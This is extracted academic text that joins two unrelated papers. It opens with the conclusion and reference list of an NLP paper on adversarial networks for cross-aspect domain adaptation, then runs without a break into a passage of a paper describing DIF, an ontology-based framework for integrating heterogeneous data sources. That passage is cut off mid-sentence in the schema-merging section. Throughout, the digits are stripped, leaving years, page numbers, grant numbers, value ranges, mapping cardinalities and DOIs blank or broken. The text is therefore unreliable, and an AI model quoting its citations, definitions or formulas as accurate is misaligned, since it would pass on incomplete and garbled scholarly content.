com- monly present in both domains. impact of keyword rules finally, figure shows the accuracy of our full model (y-axis) when trained with various amount of keyword rules for relevance learning (x-axis). as expected, the trans- fer accuracy drops significantly when using fewer rules on the pathology dataset (lcis as source and alh as target). in contrary, the accuracy on the re- view dataset (hotel service as source and restaurant as target) is not sensitive to the amount of used rel- evance rules. this can be explained by the observa- tion from table that the model without relevance scoring performs equally well as the full model due to the tight dependence in aspect labels. conclusions in this paper, we propose a novel aspect-augmented adversarial network for cross-aspect and cross- domain adaptation tasks. experimental results demonstrate that our approach successfully learns invariant representation from aspect-relevant frag- ments, yielding significant improvement over the msda baseline and our model variants. the effec- tiveness of our approach suggests the potential ap- plication of adversarial networks to a broader range of nlp tasks for improved representation learning, such as machine translation and language genera- tion. acknowledgments the authors acknowledge the support of the u.s. army research office under grant number w nf- - - . we thank the mit nlp group, the tacl action editor hal daumé iii and the anonymous reviewers for their comments. any opinions, findings, conclusions, or recommenda- tions expressed in this paper are those of the authors, and do not necessarily reflect the views of the fund- ing organizations. references dzmitry bahdanau, kyunghyun cho, and yoshua ben- gio. . neural machine translation by jointly learning to align and translate. in proceedings of the iclr. john blitzer, mark dredze, fernando pereira, et al. . biographies, bollywood, boom-boxes and blenders: domain adaptation for sentiment classification. in proceedings of the acl, volume , pages – . antoine bordes, xavier glorot, jason weston, and yoshua bengio. . joint learning of words and meaning representations for open-text semantic pars- ing. in proceedings of the aistats, volume , pages – . konstantinos bousmalis, george trigeorgis, nathan sil- berman, dilip krishnan, and dumitru erhan. . domain separation networks. in advances in neural information processing systems (nips). caroline brun, julien perez, and claude roux. . xrce at semeval- task : feedbacked ensem- ble modeling on syntactico-semantic knowledge for aspect based sentiment analysis. in proceedings of the th international workshop on semantic evaluation (semeval- ), pages – . julliette m. buckley, suzanne b. coopey, john sharko, fernanda polubriaginof, brian drohan, ahmet k. belli, elizabeth mh. kim, judy e. garber, barbara l. smith, michele a. gadd, et al. . the feasibility of using natural language processing to extract clinical information from breast pathology reports. journal of pathology informatics, ( ): . rich caruana. . multitask learning. in learning to learn, pages – . springer. ming-wei chang, lev ratinov, and dan roth. . guiding semi-supervision with constraint- driven learning. in proceedings of the acl, vol- ume , page . minmin chen, zhixiang xu, kilian weinberger, and fei sha. . marginalized denoising autoencoders for domain adaptation. in proceedings of the icml. kan chen, jiang wang, liang-chieh chen, haoyuan gao, wei xu, and ram nevatia. . abc- cnn: an attention based convolutional neural net- work for visual question answering. arxiv preprint arxiv: . v . jianpeng cheng, li dong, and mirella lapata. . long short-term memory-networks for machine read- ing. in proceedings of the emnlp. sumit chopra, suhrid balakrishnan, and raghuraman gopalan. . dlid: deep learning for do- main adaptation by interpolating between domains. in icml workshop on challenges in representation learning. ronan collobert and jason weston. . a unified ar- chitecture for natural language processing: deep neu- ral networks with multitask learning. in proceed- ings of the th international conference on machine learning, pages – . acm. jacob eisenstein. . unsupervised learning for lexicon-based classification. in proceedings of the na- tional conference on artificial intelligence (aaai). yaroslav ganin and victor lempitsky. . unsuper- vised domain adaptation by backpropagation. in pro- ceedings of the icml. yaroslav ganin, evgeniya ustinova, hana ajakan, pascal germain, hugo larochelle, françois laviolette, mario marchand, and victor lempitsky. . domain- adversarial training of neural networks. journal of machine learning research. xavier glorot, antoine bordes, and yoshua bengio. . domain adaptation for large-scale sentiment classification: a deep learning approach. in proceed- ings of the th international conference on machine learning (icml- ), pages – . ian goodfellow, jean pouget-abadie, mehdi mirza, bing xu, david warde-farley, sherjil ozair, aaron courville, and yoshua bengio. . generative ad- versarial nets. in advances in neural information pro- cessing systems, pages – . trond grenager, dan klein, and christopher d. man- ning. . unsupervised learning of field segmen- tation models for information extraction. in proceed- ings of the rd annual meeting on association for computational linguistics, pages – . associa- tion for computational linguistics. aria haghighi and dan klein. . prototype-driven learning for sequence models. in proceedings of the main conference on human language technol- ogy conference of the north american chapter of the association of computational linguistics, pages – . association for computational linguistics. sergey ioffe and christian szegedy. . batch nor- malization: accelerating deep network training by re- ducing internal covariate shift. in proceedings of the icml. jagadeesh jagarlamudi, hal daumé iii, and raghaven- dra udupa. . incorporating lexical priors into topic models. in proceedings of the th conference of the european chapter of the association for com- putational linguistics, pages – . association for computational linguistics. tao lei, regina barzilay, and tommi jaakkola. . rationalizing neural predictions. in proceedings of the emnlp. shen li, joao v. graça, and ben taskar. . wiki- ly supervised part-of-speech tagging. in proceedings of the joint conference on empirical methods in natural language processing and computational natural language learning, pages – . asso- ciation for computational linguistics. xiaodong liu, jianfeng gao, xiaodong he, li deng, kevin duh, and ye-yi wang. . representation learning using multi-task deep neural networks for se- mantic classification and information retrieval. in pro- ceedings of the hlt-naacl, pages – . mingsheng long, han zhu, jianmin wang, and michael i. jordan. . unsupervised domain adap- tation with residual transfer networks. in advances in neural information processing systems, pages – . alireza makhzani, jonathon shlens, navdeep jaitly, and ian goodfellow. . adversarial autoencoders. arxiv preprint arxiv: . v . gideon s. mann and andrew mccallum. . general- ized expectation criteria for semi-supervised learning with weakly labeled data. journal of machine learn- ing research, : – . iain j. marshall, joël kuiper, and byron c. wallace. . robotreviewer: evaluation of a system for au- tomatically assessing bias in clinical trials. journal of the american medical informatics association. andré f.t. martins and ramón fernandez astudillo. . from softmax to sparsemax: a sparse model of attention and multi-label classification. sinno jialin pan and qiang yang. . a survey on transfer learning. ieee transactions on knowledge and data engineering, ( ): – . liron pantanowitz, maryanne hornish, and robert a. goulart. . informatics applied to cytology. cyto- journal, . alec radford, luke metz, and soumith chintala. . unsupervised representation learning with deep con- volutional generative adversarial networks. in pro- ceedings of the iclr. alexander m. rush, sumit chopra, and jason weston. . a neural attention model for abstractive sen- tence summarization. in proceedings of the emnlp. ozan sener, hyun oh song, ashutosh saxena, and sil- vio savarese. . learning transferrable repre- sentations for unsupervised domain adaptation. in advances in neural information processing systems, pages – . yusuke shinohara. . adversarial multi-task learn- ing of deep neural networks for robust speech recogni- tion. interspeech , pages – . jost tobias springenberg. . unsupervised and semi- supervised learning with categorical generative adver- sarial networks. arxiv preprint arxiv: . v . yaniv taigman, adam polyak, and lior wolf. . unsupervised cross-domain image generation. arxiv preprint arxiv: . . eric tzeng, judy hoffman, ning zhang, kate saenko, and trevor darrell. . deep domain confusion: maximizing for domain invariance. arxiv preprint arxiv: . . hongning wang, yue lu, and chengxiang zhai. . latent aspect rating analysis on review text data: a rat- ing regression approach. in proceedings of the th acm sigkdd international conference on knowl- edge discovery and data mining, pages – . acm. hongning wang, yue lu, and chengxiang zhai. . latent aspect rating analysis without aspect key- word supervision. in proceedings of the th acm sigkdd international conference on knowledge discovery and data mining, pages – . acm. huijuan xu and kate saenko. . ask, attend and answer: exploring question-guided spatial attention for visual question answering. in proceedings of the eccv. kelvin xu, jimmy ba, ryan kiros, kyunghyun cho, aaron courville, ruslan salakhutdinov, richard s. zemel, and yoshua bengio. . show, attend and tell: neural image caption generation with visual at- tention. in proceedings of the icml, page . adam yala, regina barzilay, laura salama, molly griffin, grace sollender, aditya bardia, constance lehman, julliette m. buckley, suzanne b. coopey, fernanda polubriaginof, judy e. garber, barbara l. smith, michele a. gadd, michelle c. specht, thomas m. gudewicz, anthony guidi, alphonse taghian, and kevin s. hughes. . using machine learning to parse breast pathology reports. breast can- cer research and treatment. zichao yang, xiaodong he, jianfeng gao, li deng, and alex smola. . stacked attention networks for image question answering. in proceedings of the con- ference on computer vision and pattern recognition (cvpr). omar zaidan, jason eisner, and christine d. piatko. . using “annotator rationales” to improve ma- chine learning for text categorization. in proceedings of the hlt-naacl, pages – . citeseer. ye zhang, iain marshall, and byron c. wallace. . rationale-augmented convolutional neural networks for text classification. in proceedings of the emnlp. guangyou zhou, zhiwen xie, jimmy xiangji huang, and tingting he. . bi-transferring deep neural net- works for domain adaptation. in proceedings of the acl. submitted september accepted january published march corresponding author lerina aversano, aversano@unisannio.it academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright fusco and aversano distributed under creative commons cc-by . open access an approach for semantic integration of heterogeneous data sources giuseppe fusco and lerina aversano department of engineering, university of sannio, benevento, bn, italia abstract integrating data from multiple heterogeneous data sources entails dealing with data distributed among heterogeneous information sources, which can be structured, semi- structured or unstructured, and providing the user with a unified view of these data. thus, in general, gathering information is challenging, and one of the main reasons is that data sources are designed to support specific applications. very often their structure is unknown to the large part of users. moreover, the stored data is often redundant, mixed with information only needed to support enterprise processes, and incomplete with respect to the business domain. collecting, integrating, reconciling and efficiently extracting information from heterogeneous and autonomous data sources is regarded as a major challenge. in this paper, we present an approach for the semantic integration of heterogeneous data sources, dif (data integration framework), and a software prototype to support all aspects of a complex data integration process. the proposed approach is an ontology-based generalization of both global-as-view and local-as-view approaches. in particular, to overcome problems due to semantic heterogeneity and to support interoperability with external systems, ontologies are used as a conceptual schema to represent both data sources to be integrated and the global view. subjects data science, databases, emerging technologies keywords data integration, heterogeneous data sources, semantic integration, ontologies introduction the large availability of data within the enterprise context and even in any inter-enterprise context, the problem arises of managing information sources that do not use the same technology, do not have the same data representation, or that have not been designed according to the same approach. thus, in general, gathering information is a hard task, and one of the main reasons is that data sources are designed to support specific applications. very often their structure are unknown to the large part of users. moreover, the stored data is often redundant, mixed with information only needed to support enterprise processes, and incomplete with respect to the business domain. collecting, integrating, reconciling and efficiently extracting information from heterogeneous and autonomous data sources is regarded as a major challenge. over the years, several data integration solutions have been proposed: • distributed databases can be considered the first attempt to integrate databases. data, instead of being stored on a single machine, is stored on different machines. compared to the centralized case, database schema are more complicated by the need to physically how to cite this article fusco g, aversano l. . an approach for semantic integration of heterogeneous data sources. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:aversano@unisannio.it https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. figure architecture of a generic mediation system. full-size doi: . /peerjcs. /fig- distribute data over multiple machines. distributed databases require the complete integration of existing systems into a single homogeneous database. this is difficult to achieve due to technical issues (prohibitive conversion costs) and organizational difficulties (existing dbmss belong to different organizations). • federated databases have been proposed to address these limits. they are a set of multiple independent sources each of which can exchange information with the others. a connection is established for each pair of sources, and such architecture is particularly suitable when communications in the system occur predominantly between pairs of sources. the solution often adopted consists of the cooperative information systems (fig. ), in which there are two types of components: mediator and wrapper. the mediator coordinates the data flow between local sources and user applications. the mediator is not responsible for storing data, since it only stores a virtual and global view of real data (or global schema) and the mappings between the global and local views. in this way, applications will run queries over the virtual view. it will then be the mediator to build queries for individual sources of information. instead, wrappers are software components that interact directly with their respective local sources as follows: • to translate the conceptual schema of the local source into a global language; • to submit queries to local sources; • to retrieve results by sending them to the mediator, which will provide the user with a unified result. this approach allows provide users with a unified interface (called mediated schema or global schema or global view) of sources, freeing them from manually managing each source. the open research problem is the need of a not statically constructed mediator, but the need of querying mediator responsible of accessing heterogeneous and dynamic data sources trough a global view without integrating or migrating the local data source. to overcome this research problem, this paper proposes an ontology based framework to support the analysis, acquisition and processing of data from heterogeneous sources, data fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. integration framework (dif). it exploits domain ontology and provides a generalization of both global view and local view approaches, based on data virtualization. the proposed framework addresses this issue by providing access to the data layer, consisting of autonomous data sources (e.g., dbs, spreadsheets), through the mediation of a global domain view, given in terms of an ontology, and the use of a semiautomatic mapping between the data layer and the ontology. users do not have to know details of the data sources and can express their information needs as queries over the conceptual domain model. the proposes framework uses the ontology and mapping to reformulate the user queries into standard db queries that are executed directly by the database management systems (dbmss) of the sources. the global view provides a unified view of real data, so that applications and users who use data will have the perception of accessing a single data source rather than multiple sources. in this context, the work faced aspects of acquisition, integration and processing of heterogeneous data sources. the paper is organized as follows. ‘aspects of a data integration process’, ‘related work’ presents, respectively, problems that characterize data integration and proposed solutions in the state of the art. ‘data integration framework’ presents in detail the approach and architecture of the software system developed to support the integration of heterogeneous sources. ‘dif supporting tool’ presents the dif tool design and the main algorithms implemented. ‘case study’ presents a case study in order to show the results of the proposed solution. finally, ‘conclusion’ concludes this paper by submitting concluding remarks and mentioning some research issues related to data integration that are not addressed in this paper. aspects of a data integration process data integration systems using the mediation approach are characterized by an architecture (fig. ) based on a global schema and a set of sources schema. the sources contain real data, while the global scheme provides a unified, integrated and reconciled view of local sources. the main components are: the mediator, which coordinates data flow between local sources and user applications, and wrappers, which directly interact with their respective local sources. designing a data integration system is a complex task, which involves dealing with different issues. the first issue is related to the heterogeneity of the sources, as sources adopt different models and data storage systems. this poses problems in defining the schema/global view. the purpose is to provide a view with an appropriate level of abstraction for all data in the sources. the second issue is how to define mappings between global schema and local sources: in literature, in order to model the correspondences between the schemes, different approaches (lenzerini, ) have been proposed as global-as-view and local-as-view. with global-as-view (gav) approach the global schema is expressed in terms of views over data sources. with local-as-view (lav) approach the global schema is specified independently of the sources, and the relationships between global schema and sources are established by defining each source as a view built over the global schema. differences fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure matching process. full-size doi: . /peerjcs. /fig- figure merging process. full-size doi: . /peerjcs. /fig- between the two approaches are discussed in lenzerini ( ). in order to overcome the limits of gav and lav approaches, techniques that combine the benefits of these approaches have also been proposed, mitigating their disadvantages in order to provide an alternative to data integration that is more flexible and scalable. the most interesting techniques are glav (global and local as view) (katsis & papakonstantinou, ; arens et al., ) and bglav (byu global local as view) (xu & embley, ). once the mapping approach is defined, it is necessary to define the methods and techniques to be used to generate mappings between the global and the local schema. this activity is called schema matching. the set of mappings is called alignment. a matching process (shvaiko & euzenat, ) (fig. ) defines an alignment (a ′ ) for each pair of schemas (o , o ), making use of input parameters p if necessary (for example, thresholds, weights), a previously generated input alignment (a) and additional external resources r. we can now generate the global schema based on mappings defined in the schema matching activity. this activity is called schema merging. a merging process (fig. ) consists of integrating several existing schemes (o ,o ,...,on) into a single global schema (o) based on the correspondences generated by the schema matching process a, any input parameters p and external resources r. different techniques and methodologies about schema merging have been proposed in the literature (lee & ling, ; fong et al., ; chiticariu, kolaitis & popa, ; kong, hwang & kim, ). fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table comparison between gav and lav. gav lav mapping global schema expressed in terms of views over data sources data sources expressed in terms of views over global schema query processing query unfolding query rewriting/query answer- ing global schema quality exact or sound complete or exact management effort high: data source changes af- fect the global schema and other sources low: data source changes only impact the global schema another issue is related to data storage: compared to managed data there are two approaches, called materialization and virtualization. with materialization, data is also present in the global schema. on the opposite, in the virtualization approach, data that resides in sources is only available when query processing activity is executed. once we merged local views into one unified global view, we can process a query posed over the global schema. this activity is called query processing, that is how to express it in terms of a set of queries that can be processed by the sources acquired. in the lav approach the proposed solutions consist of query rewriting (or view-based query rewriting) and query answering (or view-based query answering). in the gav approach query unfolding techniques are used. the differences between the two approaches are discussed in lenzerini ( ). once the query processing activity is performed, data from different sources need to be interpreted, that is, transformed into a common representation. therefore, they must be converted, reconciled and combined. table summarizes the approaches used in mappings definition between the global schema and local ones. based on the comparison approaches in table it is possible to observe that: • the lav approach involves a priori presence of a global schema, which must be well-built in terms of concepts and relationships between them. if it is not well-built, or the integrated schemas differ greatly from each other, the global schema must be continually modified, also taking into account the previously integrated data sources. if not, the changes affect only the global schema. • with gav approach, the global schema is incrementally built: it is modified every time a new data source is integrated, adding and/or modifying concepts and relationships based on current and previously integrated data sources. conversely, in the lav case, changes do not impact previous integrated data sources (if the overall schema is well-built). • the lav approach offers greater scalability when the number of integrated data sources increases, but when that number is relatively small, and the global schema is not well-built, the gav approach increases the quality of global schema. moreover, in the context of semantic integration, the hybrid approach is surely the best solution but it reduces the reuse of local ontologies, since they have to refer to a common vocabulary. therefore, considering a possible future reuse of local the ontologies, it is fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. possible to combine the presented approaches differently in order to support different cases and to present a data integration approach in order to provide different solutions as needed. the proposed approach, called dif is based on these observations and seeks to combine the gav and lav approaches, exploiting ontologies to reach the goals. related work several systems, methodologies and approaches have been proposed in literature to support data integration from heterogeneous sources, also based on ontologies (calvanese, lembo & lenzerini, ). to overcome problems due to semantic heterogeneity, it is useful to use ontologies (wache et al., ). depending on how ontologies are used, data integration systems can adopt different approaches, such as single ontology (adopted in sims (arens et al., ; arens, hsu & knoblock, )), multiple ontology (adopted in observer (mena et al., b; mena et al., a)) and hybrid (adopted in kraft (preece, hui & gray, ; preece et al., ) and coin (goh et al., )). more recently in civili et al. ( ) it is proposed mastro studio, a java tool for ontology- based data access (obda). mastro manages obda systems in which the ontology is specified in a logic specifically tailored to ontology-based data access and is connected to external data management systems through semantic mappings that associate sql queries over the external data to the elements of the ontology. tsimmis (the stanford-ibm manager of multiple information sources) (chawathe et al., ) is based on an architecture that exposes a wrapper hierarchy (called translators) and mediators. tsimmis approach is global-as-view. wrappers convert data to a common data model called oem (object exchange model) and mediators combine and integrate them. the global scheme consists of a set of oem objects exported by wrappers to mediators. mediators are specified using a language called mediator specificaion language (msl). queries are expressed in msl or in a specific language called lorel (lightweight object repository language), an object-oriented extension of sql. each query is processed by a module, the mediator specification interpreter (msi). it should be emphasized that tsimmis does not implement a real integration, as each mediator performs integration independently of each other. it means that does not exist the concept of a unified global scheme. the result of a query could be seen inconsistent and completely different from other mediators. this form of integration is called query-based. garlic integration system is based on an architecture with data repositories at lowest level, which represent the data sources. above each data repository we find a wrapper (called repository wrapper), which is responsible for communication between a data repository and the rest of the system. in addition, each wrapper ensures the transformation of the local schema of a source into a unified schema and transforming user queries into queries executable by data source. the global schema has an object-oriented data model, managed by the query services and runtime system components, and stored in the metadata repository, based on the fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. odmg standard. odmg objects are exported by wrappers using garlic data language (gdl), based on the odl (object definition language) standard. unlike the tsimmis system, there is no mediator concept in garlic, and the integration of odmg objects from different sources is performed by wrappers. momis (mediator environment for multiple information sources) (orsini et al., ; beneventano & bergamaschi, ) is a data integration system that manages structured and semistructured data sources. momis is based on i architecture (hull & king, ), consisting of several wrappers and a mediator. the integration methodology starts with an extraction activity where user uses a wrapper that transforms the structure of a data source into a odli (object definition language) model based on descriptive logic. the integration process generates an integrated view of data sources using global-as-view approach, building the global schema incrementally. at the end of the momis integration process, starting when the query is posed by the user over the global schema, the mediator generates a oqli query and sends it to wrappers, which translate it into a query executable from the corresponding data source. ontology-based data access is by now a popular paradigm which has been developed in recent years to overcome the difficulties in accessing and integrating legacy data sources (xiao et al., ). in obda, users are provided with a high level conceptual view of the data in the form of an ontology that encodes relevant domain knowledge. the concepts and roles of the ontology are associated via declarative mappings to sql queries over the underlying relational data sources. hence, user queries formulated over the ontology can be automatically rewritten, taking into account both ontology axioms and mappings, into sql queries over the sources. overall, the large part of the analysed approaches, use their own description language, for both local and global schemas, and queries. however, if a generic external application wants to communicate with one of the systems presented, it should know the specific query language and/or the specific language used to describe the schemas. the problem of translation between languages is widened if we consider interoperability with the web. for this reason, the proposed approach, data integration framework (dif), exploits the use of ontologies supported by a semiautomatic mapping strategy. data integration framework the proposed data integration framework, is a generalization of both gav and lav approaches, based on data virtualization, and provides the possibility to define a mappings in both gav approach (a correspondence between a view expressed in terms of the global schema and a view expressed in terms of the local schema) and lav approach (correspondence between a view expressed in terms of the local schema and a view expressed in terms of the global schema). in addition, to overcome problems due to semantic heterogeneity and to support interoperability with external systems, ontologies are used as a conceptual schema to represent both data sources to be integrated and the global schema, and therefore each mapping is defined as a correspondence between elements of ontologies: concepts (or classes), datatype properties, and object properties. since the fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data virtualization approach is also used to define local ontologies, the construction of an ontology to represent a local source is guided by additional mappings, called source- mappings, defined as correspondences between elements of local ontology and elements that characterize the source itself (for example, for a relational source a mappings will be defined as a correspondence between an ontology concept and the table that represents it). in the proposed solution, the query rewriting is used to reformulate a query posed over the global ontology into a set of queries posed over the local ontologies. this is due to the choice of using ontologies also to describe data sources to be integrated. in this way, though, the mediation process is not completed yet, since local ontologies do not contain real data. to complete the mediation process, a second query translation task is required to reformulate a query posed over the local ontology into a set of queries posed over the corresponding source. definition . (data integration framework) the data integration framework dif is a -uple (og,ol,a,mt,sml) where: - og is the global ontology, expressed in a log logic. - ol is the local ontology, expressed in a los logic. - a (alignment) is a set of mappings m ,m ,...,mn between ontologies og and ol. each mapping mi is a -uple (id,es,et,n,rel) where: - id is the unique mapping identifier; - es and et , respectively, are the elements of the source ontology os and target ot . in the case of a gav mapping type, os represents the local ontology and ot the global one, vice versa in the case of a lav mapping type; - n is a measure of confidence (typically within a range [ , ]) that indicates the similarity between es and et ; - rel is a relationship between es and et (for example, equivalence, subsumption, disjunction). - mt (mapping table) is a table whose rows represent an element eg of the global ontology og and columns represent elements el ,el ,...,eln of the local ontology ol that are mapped to eg . - sml (source mapping list) is a set of mappings sm ,sm ,...,smn between the local ontology ol and the correspondent data source si. each mapping smi, called source- mapping, is a triple (id,srck,dsth) where: - id is the unique mapping identifier; - srck is a source element of the local ontology ol. - dsth is a destination element of the local data source si (for example, a table of a relational source). the framework must be able to handle both the integration process and the mediation process, which is shown in fig. , making activities as automated as possible. the integration process is divided into the following activities: fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure overview of integration and mediation processes. full-size doi: . /peerjcs. /fig- . source wrapping: for each source you want to integrate, you build an ontology to describe it. in addition, source-mappings are defined between the ontology and the data source, which will be subsequently used during the mediation process. . schema matching: for each local ontology, mappings are generated between it and global ontology. the matching activity generates mappings between a source ontology and a target one. therefore, considering as target ontology the local one, it is possible to generate lav mappings. conversely, the followed approach will be gav. mappings are eventually validated or modified by the integrator designer. if the number of data sources to be integrated is , global and local ontologies are the same. . schema merging: each local ontology, taking into account the set of mappings defined in the previous activity, is integrated into the global ontology and the mapping table is updated. at this stage, global ontology is built incrementally. the mediation process, however, following a query submission, is divided into the following phases: . global query processing: a query posed over the global ontology is reformulated, through rewriting, into a set of queries posed over local ontologies, using the mapping table generated at the end of the integration process; fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure overview of dif supporting tool: (a) integration approach and (b) uml diagram. full-size doi: . /peerjcs. /fig- . local query processing: each local query is reformulated into a set of queries over the corresponding data source, using source-mappings generated in the source wrapping activity. this set of queries, once executed, allows you to retrieve the real data. . data reconciliation: extracted data from the previous activity is reconciled and combined before being presented to the user. local and global ontologies are expressed in owl-dl (https://www.w .org/tr/owl- features/), whose basic elements are classes c, object properties op and datatype properties dp. instances i are not considered mapping because the data management approach is virtualization rather than materialization. dif supporting tool the tool, designed and developed to support the dif framework, presents the typical architecture of integration systems based on the mediation approach (fig. ), providing two main components: mediator and wrapper. according to definition . and the description of the activities to be performed during integration and mediation processes, the architecture is composed by acquisition, integration and mediation subsystems. source wrapping data sources that the framework allows to integrate are structured and semi-structured (in particular, spreadsheet, json, and xml data sources). the source wrapping activity is performed by a class that implements the iwrapper interface. the output of this activity, fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://www.w .org/tr/owl-features/ https://www.w .org/tr/owl-features/ http://dx.doi.org/ . /peerj-cs. for each data source s, is a pair (o,sml) composed by the local ontology o, which describes the data source s, and the associated source mapping list sml. relational data sources integration the system allows the integration of relational data sources via jdbc connection (http://www.oracle.com/technetwork/java/javase/tech/index-jsp- .html) and supported databases are: mysql, postgresql, h , db , microsoft sql server, oracle, telid and monetdb. relational data sources are connected to the framework by defining r rml (https://www.w .org/tr/r rml/) mappings. each r rml mapping therefore represents a source-mapping, according with definition . . local ontology is generated by identifying conditions associated to the database tables (ghawi & cullot, ) and, through identified conditions, associating each database element (table, column) to the corresponding ontology (class, datatype property, object property). in addition to r rml mapping, you can use a more compact notation, called axiom mapping, consisting of three elements: • mappingid: mapping identifier; • source: a sql query posed over the database; • target: rdf triple containing variables that refer to the names of the columns mentioned in the source query. each source source mapping sm(id,srck,dsth) (definition . , contained in the source mapping list sml, contains an owl resource (or local schema element) srck and an r rml mapping (or an axiom mapping) dtsh. spreadsheet data sources integration spreadsheet data sources are integrated with a new approach that seeks to examine the internal structure of the tables in order to extract an ontology that reflects as much as possible the data source. the approach is divided into several phases: . source scanning: the spreadsheet file is scanned in order to locate tables. at the end of the scan, a text string that describes the table structure is produced. . parsing: the text string is parsed in order to generate the ontology elements, the relationships between them, and the physical location of cells within the spreadsheet data source. the output of this step is a list of schema attribute tables. . analysis: an analysis of the list of attribute tables built to the previous step is performed to aggregate attributes with the same name in different concepts. . restructuring: the generated ontology is refined in order to improve its quality. each source-mapping sm(id,srck,dsth) contained the source mapping list sml (definition . ) contains an owl resource (or local schema element) srck and a data structure to track cells within the spreadsheet data source dtsh. xml data sources integration xml data sources integration is based on its xsd schema (ghawi & cullot, ). if the xml schema does not exist, it is generated. possible mappings are: fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.oracle.com/technetwork/java/javase/tech/index-jsp- .html https://www.w .org/tr/r rml/ http://dx.doi.org/ . /peerj-cs. • class mapping: xml nodes mapped as classes are complex types and element-group declarations (if they contain complex types). the xml schema supports two inheritance mechanisms (extensions and restriction), which are also mapped as classes. • property mapping: if an xml node has a simple type, or is an attribute-group declaration, or is an element-group declaration without additional associated complex types, it is mapped as properties, and its domain is the class corresponding to the parent node. attributes are treated as simple types. in ghawi & cullot ( ), instead, all element-groups and attributes-groups are mapped as classes. • relation mapping: if an element is a complex type and contains another element, whose type is also complex, a relationship is created between the respective classes. the algorithm, in the ontology generation step, receives the xsg graph of the xml schema (xml schema graph) input. starting from the root node, a deep visit is performed, generating an xpath expression for each visited node. each source-mapping sm(id,srck,dsth) contained the source mapping list sml (definition . ) contains an owl resource (or local schema element) srck and the xpath expression dtsh. schema maching the goal of schema matching activity is to generate a set of mapping between local and global ontologies, which will then be validated by the user. the adopted approach generates mappings between classes, considering both semantic and contextual characteristics. before to execute schema matching, a semantic annotation activity of ontologies is performed, whose output is a set of annotations an , one for each ei element of the schema, where each annotation ani is a triple (toki,posi,sensei) consisting of: • toki: the token associated with the element ei; • posi: the lexical category of the token toki; • sensei: the meaning associated with toki token for the lexical category posi, obtained as the output of the disambiguation process. in the semantic matching task, a semantic-based matcher is applied to all pairs (cgi,clj), where cgi is the i-th class of the global schema, while clj is the j-th class of the local schema. the semantic matcher, for each pair (cg,cl), generates the following information: • semanticrel: the type of semantic relation (≡,v,w,idk); • semanticsim: is a coefficient∈[ , ] that specifies the reliability of the generated semantic relation. given n and m the number of local and global schema classes, respectively, the output of the semantic matching activity is: (cgi,clj)⇒i∈[ ,m] j∈[ ,n] { semanticrel semanticsim } the contextual matching activity generates mappings between classes taking into account how they are modeled, that is considering their properties. first, you must determine the equivalent properties between the two schemes. this is done by applying to all pairs fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (pg,pl), where pg and pl are the properties of the global and local schema respectively, the syntax-based or the semantic-based matcher. the syntax-based matcher, by analyzing the syntactic structure of words, returns for each pair (pg,pl) a coefficient in a range [ , ]. if the latter is greater than or equal to the β threshold value, a mapping is generated between pg and pl. the semantic-based matcher, instead, using wordnet to extract property sense, generates a mapping between pg and pl if there is an equivalence relation for at least one token pair. the semantic-based matcher is useful if synonyms are used to represent the same property and/or to discover mappings :n. once the mappings have been discovered, it is possible to calculate, for all pairs (pg,pl), the degree of contextual similarity, defined as contextualsim, by applying the jaccard measure: contextualsim(cg,cl)= |p(cg)∩p(cl)| |p(cg)∪p(cl)| where p(cg) and p(cl) are the set of properties of the classes cg and cl respectively. the cardinality of the intersection of the two sets is equal to the number of existing mappings between the properties of the two classes. given n and m the number of local and global schema classes, respectively, the output of the contextual matching activity is a set of pair as: (cgi,clj)⇒i∈[ ,m] j∈[ ,n] { contextualsim mp(cgi),p(clj) } where mp(cgi),p(clj) is the set of mappings between the properties of classes cgi and clj: mp(cgi),p(clj)=   p (cgi) ←→ p (clj) p (cgi) ←→ p (clj) ··· pk(cgi) ←→ pz(clj)   where k is the number of properties of the class cgi and z is the number of properties of the class clj. to determine which mappings can be returned to the user, a selection step is performed. the principle is that if there is a semantic relation semanticrel and the degree of contextual similarity contextualsim is greater than or equal to a threshold value, the corresponding mappings can be returned. by lowering these values, more weight is given to semantic characteristics rather than contextual ones. given a semantic relation rel and a threshold value α, the algorithm selects : , :n, n: and n:m mappings between all pairs of classes (cgi,clj) if there is a semantic relation equal to rel and if contextualsim≥α. if more mappings :n, n: and n:m for the same pair of classes (cgi,cli) have a threshold value grater than α, is returned the mapping with the largest number of classes. the output is the set of selected mappings. the output of schema matching activity, according to the definition . , is a alignment a consisting of a set of mappings between the local and global fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. schema classes, obtained after the selection step: a={m({cg}k,{cl}z)}⇒(cgi,clj)⇒i∈[ ,k] j∈[ ,z]   semanticrel similarity mp(cgi),p(clj)   mappings can be : , :n, n: and n:m. schema merging the goal of schema merging activity, starting from user validated mappings, is the fusion between the local and global schema, generating a new virtual view. schema merging activity is divided into two steps: • in the first step, changes in the global schema are generated; • in the second step, based on the proposed changes, the fusion of schemas is performed. in the first step, given an input 